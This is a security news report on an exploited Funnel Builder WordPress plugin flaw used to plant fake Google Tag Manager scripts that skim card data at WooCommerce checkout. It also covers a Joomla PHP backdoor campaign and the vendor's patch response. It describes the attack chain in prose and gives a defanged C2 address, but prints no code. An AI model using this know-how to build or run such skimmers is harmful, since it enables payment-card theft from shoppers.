A critical security vulnerability impacting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data.
Details of the activity were published by Sansec this week. The vulnerability currently does not have an official CVE identifier. It affects all versions of the plugin before 3.15.0.3. It's used in more than 40,000 WooCommerce stores.
The flaw lets unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store, the Dutch e-commerce security company said. FunnelKit, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
"Attackers are planting fake Google Tag Manager scripts into the plugin's 'External Scripts' setting," it noted. "The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout."
Per Sansec, Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run. However, older versions were designed such that they never checked the caller's permissions or limited which methods are allowed to be invoked.
A bad actor could exploit this loophole by issuing an unauthenticated request that can reach an unspecified internal method that writes attacker-controlled data directly into the plugin's global settings. The added code snippet is then injected into every Funnel Builder checkout page.
As a result, an attacker could plant a malicious <script> tag that's triggered on every checkout transaction in a susceptible WordPress site.
In at least one case, Sansec said it observed a payload masquerading as a Google Tag Manager (GTM) loader to launch JavaScript hosted on a remote domain. It subsequently opens a WebSocket connection to the attacker's command-and-control (C2) server ("wss://protect-wss[.]com/ws") to retrieve a skimmer that's tailored to the victim's storefront.
The end goal of the attack is to siphon credit card numbers, CVVs, billing addresses, and other personal information that could be entered by site visitors at checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review Settings > Checkout > External Scripts for anything that's unfamiliar and remove it.
"Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern , since reviewers tend to skim straight past anything that looks like a familiar tracking tag," Sansec said.
The disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites are being backdoored with heavily obfuscated PHP code to contact attacker-controlled C2 servers, receive and process instructions sent by the operators, and serve spammy content to visitors and search engines without the site owner's knowledge. The ultimate aim is to leverage the sites' reputation for injecting spam.
"The script acts as a remote loader," security researcher Puja Srivastava said . "It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve."
"This approach allows attackers to change the behavior of the compromised website at any time without modifying the local files again. The attacker can inject spam product links, redirect visitors, or display malicious pages dynamically."
Update
In a statement shared with The Hacker News, FunnelKit said it patched and released a fix for the vulnerability within 36 hours of the first report, adding it worked with the official WordPress.org plugin team to auto-update existing installations to the latest version without requiring any action from the merchants.
Out of an abundance of caution, the company said the fix has also been backported to all earlier versions and known attacker domains have been blocked at the DNS level to neutralize the attack vector.
"The vulnerability has been patched and the active exploitation path has been closed," FunnelKit said in a statement. "Stores running version 3.15.0.3 or later, including those automatically updated through WordPress.org, are no longer vulnerable to this issue and are not exposed to the previously reported attack."
"The overall impact appears to have been limited. During the nine days following disclosure, our monitoring covered a sample of more than 1,300 sites. Of those, only three showed signs of compromise before our mitigations took effect. We believe this limited impact was due to the speed of the patch release, the automatic update rollout coordinated through WordPress.org, and the domain-blocking measures that disrupted the attack infrastructure."
(The story was updated after publication on May 31, 2026, to include a response from FunnelKit and reflect the fact that the vulnerability is no longer actively exploited.)
